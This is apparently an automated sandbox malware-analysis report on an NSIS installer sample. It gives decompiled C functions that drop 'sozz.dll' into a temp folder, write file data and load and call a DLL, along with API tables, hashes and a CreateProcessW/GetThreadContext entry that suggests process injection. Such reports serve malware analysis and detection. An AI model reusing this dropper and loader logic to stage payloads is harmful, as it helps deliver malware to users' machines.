                                                                                                • API String ID: 4283519449-130040084
                                                                                                • Opcode ID: 0c7fdcf59c0fb2b92b8374371fd2f99e1dcbb6099d677134b975e3fd63279e42
                                                                                                • Instruction ID: 825a226a8dc595578503c7203fc5804032ed62a4dd83b14a28db2b62ef09ea34
                                                                                                • Opcode Fuzzy Hash: 0c7fdcf59c0fb2b92b8374371fd2f99e1dcbb6099d677134b975e3fd63279e42
                                                                                                • Instruction Fuzzy Hash: 0651D371900214ABDF20AF75DE89BAE7BA8EF04319F10457BF500B22D1C7B89D418B9D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00401734, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 60%
                                                                                                			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029E8(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E0040548B(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E0040541E(E0040592B(0x409b78, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409b78);
					E0040592B();
				}
				E00405B89(0x409b78);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405C22(0x409b78);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E004055E3(0x409b78);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405602(0x409b78, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404CC9(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42ebe8;
						goto L32;
					} else {
						E0040592B(0x40a378, 0x42f000);
						E0040592B(0x42f000, 0x409b78);
						E0040594D(_t75, 0x40a378, 0x409b78, "C:\Users\jones\AppData\Local\Temp\nszE2AE.tmp\sozz.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E0040592B(0x42f000, 0x40a378);
						_t62 = E004051EC("C:\Users\jones\AppData\Local\Temp\nszE2AE.tmp\sozz.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42ebe8 =  &( *0x42ebe8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b78);
								_push(0xfffffffa);
								E00404CC9();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404CC9(0xffffffea,  *(_t85 - 8));
				 *0x42ec14 =  *0x42ec14 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 0x34));
				_push( *((intOrPtr*)(_t85 - 0x1c)));
				_t43 = E00402E44(); // executed
				 *0x42ec14 =  *0x42ec14 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E0040594D(_t75, _t80, 0x409b78, 0x409b78, 0xffffffee);
					} else {
						E0040594D(_t75, _t80, 0x409b78, 0x409b78, 0xffffffe9);
						lstrcatA(0x409b78,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b78);
					E004051EC();
					goto L29;
				}
				goto L33;
			}
















                                                                                                0x00401734
                                                                                                0x0040173b
                                                                                                0x00401744
                                                                                                0x00401747
                                                                                                0x0040174a
                                                                                                0x0040174f
                                                                                                0x00401757
                                                                                                0x00401773
                                                                                                0x00401759
                                                                                                0x00401759
                                                                                                0x0040175a
                                                                                                0x0040175a
                                                                                                0x00401779
                                                                                                0x00401783
                                                                                                0x00401783
                                                                                                0x00401787
                                                                                                0x0040178a
                                                                                                0x0040178f
                                                                                                0x00401791
                                                                                                0x00401793
                                                                                                0x00401798
                                                                                                0x00401798
                                                                                                0x004017a3
                                                                                                0x004017a3
                                                                                                0x004017b4
                                                                                                0x004017b6
                                                                                                0x004017b6
                                                                                                0x004017b7
                                                                                                0x004017b7
                                                                                                0x004017ba
                                                                                                0x004017bd
                                                                                                0x004017c0
                                                                                                0x004017c0
                                                                                                0x004017c7
                                                                                                0x004017d6
                                                                                                0x004017db
                                                                                                0x004017de
                                                                                                0x004017e1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004017e3
                                                                                                0x004017e6
                                                                                                0x00401840
                                                                                                0x00401845
                                                                                                0x004015a8
                                                                                                0x0040264e
                                                                                                0x0040264e
                                                                                                0x0040287d
                                                                                                0x00402880
                                                                                                0x00402880
                                                                                                0x00000000
                                                                                                0x004017e8
                                                                                                0x004017ee
                                                                                                0x004017f9
                                                                                                0x00401806
                                                                                                0x00401811
                                                                                                0x00401827
                                                                                                0x00401827
                                                                                                0x0040182a
                                                                                                0x00000000
                                                                                                0x00401830
                                                                                                0x00401830
                                                                                                0x00401831
                                                                                                0x0040184e
                                                                                                0x00402886
                                                                                                0x00402886
                                                                                                0x00402886
                                                                                                0x00401833
                                                                                                0x00401833
                                                                                                0x00401834
                                                                                                0x00401492
                                                                                                0x00402200
                                                                                                0x00402200
                                                                                                0x00402200
                                                                                                0x00401831
                                                                                                0x0040182a
                                                                                                0x00402888
                                                                                                0x0040288c
                                                                                                0x0040288c
                                                                                                0x0040185e
                                                                                                0x00401863
                                                                                                0x00401869
                                                                                                0x0040186a
                                                                                                0x0040186b
                                                                                                0x0040186e
                                                                                                0x00401871
                                                                                                0x00401876
                                                                                                0x0040187c
                                                                                                0x00401880
                                                                                                0x00401882
                                                                                                0x0040188a
                                                                                                0x00401896
                                                                                                0x00401884
                                                                                                0x00401884
                                                                                                0x00401888
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00401888
                                                                                                0x0040189f
                                                                                                0x004018a5
                                                                                                0x004018a7
                                                                                                0x00000000
                                                                                                0x004018ad
                                                                                                0x004018ad
                                                                                                0x004018b0
                                                                                                0x004018c8
                                                                                                0x004018b2
                                                                                                0x004018b5
                                                                                                0x004018be
                                                                                                0x004018be
                                                                                                0x004018cd
                                                                                                0x004018d2
                                                                                                0x004021fb
                                                                                                0x00000000
                                                                                                0x004021fb
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • lstrcatA.KERNEL32(00000000,00000000,cegrwbhzuj,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                                                                                                • CompareFileTime.KERNEL32(-00000014,?,cegrwbhzuj,cegrwbhzuj,00000000,00000000,cegrwbhzuj,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                                                                                                  • Part of subcall function 0040592B: lstrcpynA.KERNEL32(?,?,00000400,00403151,jpfyweowskz Setup,NSIS Error), ref: 00405938
                                                                                                  • Part of subcall function 00404CC9: lstrlenA.KERNEL32(004297B0,00000000,0041B732,73BCEA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                                                                                                  • Part of subcall function 00404CC9: lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041B732,73BCEA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                                                                                                  • Part of subcall function 00404CC9: lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041B732,73BCEA30), ref: 00404D25
                                                                                                  • Part of subcall function 00404CC9: SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                                                                                                  • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404D5D
                                                                                                  • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404D77
                                                                                                  • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404D85
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nszE2AE.tmp$C:\Users\user\AppData\Local\Temp\nszE2AE.tmp\sozz.dll$cegrwbhzuj
                                                                                                • API String ID: 1941528284-2584084563
                                                                                                • Opcode ID: 9637652f00c021062d2dbe4245cc16957b59b03da3b62afee8cfd87e020825ba
                                                                                                • Instruction ID: 57f74d31a3863b2a576bf3fc3f2571be4e71849821accf25204d9298bb77468e
                                                                                                • Opcode Fuzzy Hash: 9637652f00c021062d2dbe4245cc16957b59b03da3b62afee8cfd87e020825ba
                                                                                                • Instruction Fuzzy Hash: 6C41B471900515FACF10BBB5DD46EAF36A9EF01368B20433BF511B21E1D63C8E418AAE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00402E44, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 174fileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 95%
                                                                                                			E00402E44(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t67;
				void* _t68;
				long _t74;
				intOrPtr _t79;
				long _t80;
				void* _t82;
				int _t84;
				intOrPtr _t95;
				void* _t97;
				void* _t100;
				long _t101;
				signed int _t102;
				long _t103;
				int _t104;
				intOrPtr _t105;
				long _t106;
				void* _t107;

				_t102 = _a16;
				_t97 = _a12;
				_v12 = _t102;
				if(_t97 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t97;
				if(_t97 == 0) {
					_v16 = 0x418b80;
				}
				_t65 = _a4;
				if(_a4 >= 0) {
					_t95 =  *0x42ebb8; // 0x345fd
					E00403098(_t95 + _t65);
				}
				_t67 = E00403066( &_a16, 4); // executed
				if(_t67 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t97 == 0) {
							while(_a16 > 0) {
								_t103 = _v12;
								if(_a16 < _t103) {
									_t103 = _a16;
								}
								if(E00403066(0x414b80, _t103) == 0) {
									goto L34;
								} else {
									if(WriteFile(_a8, 0x414b80, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t68);
										return _t68;
									} else {
										_v8 = _v8 + _t103;
										_a16 = _a16 - _t103;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t102) {
							_t102 = _a16;
						}
						if(E00403066(_t97, _t102) != 0) {
							_v8 = _t102;
							goto L45;
						} else {
							goto L34;
						}
					}
					_t74 = GetTickCount();
					 *0x40b4e4 =  *0x40b4e4 & 0x00000000;
					 *0x40b4e0 =  *0x40b4e0 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t74;
					 *0x40afc8 = 8;
					 *0x414b70 = 0x40cb68;
					 *0x414b6c = 0x40cb68;
					 *0x414b68 = 0x414b68;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t104 = 0x4000;
						if(_a16 < 0x4000) {
							_t104 = _a16;
						}
						if(E00403066(0x414b80, _t104) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t104;
						 *0x40afb8 = 0x414b80;
						 *0x40afbc = _t104;
						while(1) {
							_t100 = _v16;
							 *0x40afc0 = _t100;
							 *0x40afc4 = _v12;
							_t79 = E00405D23(0x40afb8);
							_v28 = _t79;
							if(_t79 < 0) {
								break;
							}
							_t105 =  *0x40afc0; // 0x41b732
							_t106 = _t105 - _t100;
							_t80 = GetTickCount();
							_t101 = _t80;
							if(( *0x42ec14 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t107 = _t107 + 0xc;
								E00404CC9(0,  &_v92);
								_v20 = _t101;
							}
							if(_t106 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_t82 =  *0x40afc0; // 0x41b732
									_v8 = _v8 + _t106;
									_v12 = _v12 - _t106;
									_v16 = _t82;
									L24:
									if(_v28 != 1) {
										continue;
									}
									goto L45;
								}
								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
								if(_t84 == 0 || _v24 != _t106) {
									goto L29;
								} else {
									_v8 = _v8 + _t106;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}



























                                                                                                0x00402e4c
                                                                                                0x00402e50
                                                                                                0x00402e53
                                                                                                0x00402e58
                                                                                                0x00402e5a
                                                                                                0x00402e5a
                                                                                                0x00402e61
                                                                                                0x00402e65
                                                                                                0x00402e6a
                                                                                                0x00402e6c
                                                                                                0x00402e6c
                                                                                                0x00402e73
                                                                                                0x00402e78
                                                                                                0x00402e7a
                                                                                                0x00402e83
                                                                                                0x00402e83
                                                                                                0x00402e8e
                                                                                                0x00402e95
                                                                                                0x00403011
                                                                                                0x00403011
                                                                                                0x00000000
                                                                                                0x00402e9b
                                                                                                0x00402e9f
                                                                                                0x00402ffc
                                                                                                0x00403051
                                                                                                0x00403016
                                                                                                0x0040301c
                                                                                                0x0040301e
                                                                                                0x0040301e
                                                                                                0x0040302f
                                                                                                0x00000000
                                                                                                0x00403031
                                                                                                0x00403044
                                                                                                0x00402ff6
                                                                                                0x00402ff6
                                                                                                0x00403013
                                                                                                0x00403013
                                                                                                0x00000000
                                                                                                0x0040304b
                                                                                                0x0040304b
                                                                                                0x0040304e
                                                                                                0x00000000
                                                                                                0x0040304e
                                                                                                0x00403044
                                                                                                0x0040302f
                                                                                                0x0040305c
                                                                                                0x00000000
                                                                                                0x0040305c
                                                                                                0x00403001
                                                                                                0x00403003
                                                                                                0x00403003
                                                                                                0x0040300f
                                                                                                0x00403059
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040300f
                                                                                                0x00402eab
                                                                                                0x00402ead
                                                                                                0x00402eb4
                                                                                                0x00402ebb
                                                                                                0x00402ebb
                                                                                                0x00402ec2
                                                                                                0x00402eca
                                                                                                0x00402ed4
                                                                                                0x00402ed9
                                                                                                0x00402ee1
                                                                                                0x00402eeb
                                                                                                0x00402eee
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00402ef4
                                                                                                0x00402ef4
                                                                                                0x00402ef4
                                                                                                0x00402efc
                                                                                                0x00402efe
                                                                                                0x00402efe
                                                                                                0x00402f0f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00402f15
                                                                                                0x00402f18
                                                                                                0x00402f1e
                                                                                                0x00402f24
                                                                                                0x00402f24
                                                                                                0x00402f2f
                                                                                                0x00402f35
                                                                                                0x00402f3a
                                                                                                0x00402f41
                                                                                                0x00402f44
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00402f4a
                                                                                                0x00402f50
                                                                                                0x00402f52
                                                                                                0x00402f5b
                                                                                                0x00402f5d
                                                                                                0x00402f8b
                                                                                                0x00402f91
                                                                                                0x00402f9a
                                                                                                0x00402f9f
                                                                                                0x00402f9f
                                                                                                0x00402fa6
                                                                                                0x00402fea
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00402fa8
                                                                                                0x00402fab
                                                                                                0x00402fcd
                                                                                                0x00402fd2
                                                                                                0x00402fd5
                                                                                                0x00402fd8
                                                                                                0x00402fdb
                                                                                                0x00402fdf
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00402fe5
                                                                                                0x00402fb9
                                                                                                0x00402fc1
                                                                                                0x00000000
                                                                                                0x00402fc8
                                                                                                0x00402fc8
                                                                                                0x00000000
                                                                                                0x00402fc8
                                                                                                0x00402fc1
                                                                                                0x00402fa6
                                                                                                0x00402ff2
                                                                                                0x00000000
                                                                                                0x00402ff2
                                                                                                0x00000000
                                                                                                0x00402ef4

                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 00402EAB
                                                                                                • GetTickCount.KERNEL32 ref: 00402F52
                                                                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F7B
                                                                                                • wsprintfA.USER32 ref: 00402F8B
                                                                                                • WriteFile.KERNELBASE(00000000,00000000,0041B732,7FFFFFFF,00000000), ref: 00402FB9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CountTick$FileWritewsprintf
                                                                                                • String ID: ... %d%%$icalSection
                                                                                                • API String ID: 4209647438-802315215
                                                                                                • Opcode ID: 82a9aedbd2f3b533e53c55a0f3032eb9fe86cf46c86e88442e97a38cb8fe0156
                                                                                                • Instruction ID: 9e0124e4ae7d277b0b54c9942477664c6d45ab1b3c5c68ad5b6cbbf63d84754e
                                                                                                • Opcode Fuzzy Hash: 82a9aedbd2f3b533e53c55a0f3032eb9fe86cf46c86e88442e97a38cb8fe0156
                                                                                                • Instruction Fuzzy Hash: A5619E7180120ADBDF10DF65DA48A9F7BB8BB44365F10413BE910B72C4C778DA51DBAA
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDC3022, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 237processthreadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 6EDC3166
                                                                                                • GetThreadContext.KERNELBASE(?,00010007), ref: 6EDC3189
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ContextCreateProcessThread
                                                                                                • String ID: D
                                                                                                • API String ID: 2843130473-2746444292
                                                                                                • Opcode ID: fab4b06c36a52b175d459c89c80838db2ff9fe0d2f890745020cbef4d1286ed1
                                                                                                • Instruction ID: 0ad0dc471f9b8d1121d53012a60dd925a682bb599ab19b0d5102eaaa3c7e7016
                                                                                                • Opcode Fuzzy Hash: fab4b06c36a52b175d459c89c80838db2ff9fe0d2f890745020cbef4d1286ed1
                                                                                                • Instruction Fuzzy Hash: 12A10571E40109EFDB40DFE4C984BAEBBB9BF08B89F1044A5E515EB290D731AA41CF11
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00401F51, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 57%
                                                                                                			E00401F51(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t25;
				void* _t26;
				struct HINSTANCE__* _t29;
				CHAR* _t31;
				intOrPtr* _t32;
				void* _t33;

				_t26 = __ebx;
				asm("sbb eax, 0x42ec18");
				 *(_t33 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L14:
					E00401423();
					L15:
					 *0x42ebe8 =  *0x42ebe8 +  *(_t33 - 4);
					return 0;
				}
				_t31 = E004029E8(0xfffffff0);
				 *(_t33 + 8) = E004029E8(1);
				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
					_t29 = _t18;
					if(_t29 == _t26) {
						_push(0xfffffff6);
						goto L14;
					}
					L4:
					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
					if(_t32 == _t26) {
						E00404CC9(0xfffffff7,  *(_t33 + 8));
					} else {
						 *(_t33 - 4) = _t26;
						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x42f000, 0x40af78, "��B"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
							if( *_t32() != 0) {
								 *(_t33 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
						FreeLibrary(_t29);
					}
					goto L15;
				}
				_t25 = GetModuleHandleA(_t31); // executed
				_t29 = _t25;
				if(_t29 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                                0x00401f51
                                                                                                0x00401f51
                                                                                                0x00401f56
                                                                                                0x00401f5d
                                                                                                0x0040200b
                                                                                                0x00402156
                                                                                                0x00402156
                                                                                                0x0040287d
                                                                                                0x00402880
                                                                                                0x0040288c
                                                                                                0x0040288c
                                                                                                0x00401f6c
                                                                                                0x00401f76
                                                                                                0x00401f79
                                                                                                0x00401f88
                                                                                                0x00401f8c
                                                                                                0x00401f92
                                                                                                0x00401f96
                                                                                                0x00402004
                                                                                                0x00000000
                                                                                                0x00402004
                                                                                                0x00401f98
                                                                                                0x00401fa2
                                                                                                0x00401fa6
                                                                                                0x00401fea
                                                                                                0x00401fa8
                                                                                                0x00401fab
                                                                                                0x00401fae
                                                                                                0x00401fde
                                                                                                0x00401fb0
                                                                                                0x00401fb3
                                                                                                0x00401fbc
                                                                                                0x00401fbe
                                                                                                0x00401fbe
                                                                                                0x00401fbc
                                                                                                0x00401fae
                                                                                                0x00401ff2
                                                                                                0x00401ff9
                                                                                                0x00401ff9
                                                                                                0x00000000
                                                                                                0x00401ff2
                                                                                                0x00401f7c
                                                                                                0x00401f82
                                                                                                0x00401f86
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                                                                                                  • Part of subcall function 00404CC9: lstrlenA.KERNEL32(004297B0,00000000,0041B732,73BCEA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                                                                                                  • Part of subcall function 00404CC9: lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041B732,73BCEA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                                                                                                  • Part of subcall function 00404CC9: lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041B732,73BCEA30), ref: 00404D25
                                                                                                  • Part of subcall function 00404CC9: SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                                                                                                  • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404D5D
                                                                                                  • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404D77
                                                                                                  • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404D85
                                                                                                • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                                                                                                • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                • String ID: B
                                                                                                • API String ID: 2987980305-3806887055
                                                                                                • Opcode ID: d7593822058d6da3c5713086c5ed2afad92f262bec81073bd949cd63f8a168fb
                                                                                                • Instruction ID: a273586f2596c922aa8c6de030caecb0164783ff06d74c4b05909b62d3698487
                                                                                                • Opcode Fuzzy Hash: d7593822058d6da3c5713086c5ed2afad92f262bec81073bd949cd63f8a168fb
                                                                                                • Instruction Fuzzy Hash: AA11EB72908215E7CF107FA5CD89EAE75B06B40359F20423BF611B62E0C77D4941D65E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004015B3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 85%
                                                                                                			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029E8(0xfffffff0);
				_t10 = E004054B2(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E00405449(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040592B("C:\\Users\\jones\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                                                                                                0x004015b3
                                                                                                0x004015ba
                                                                                                0x004015bd
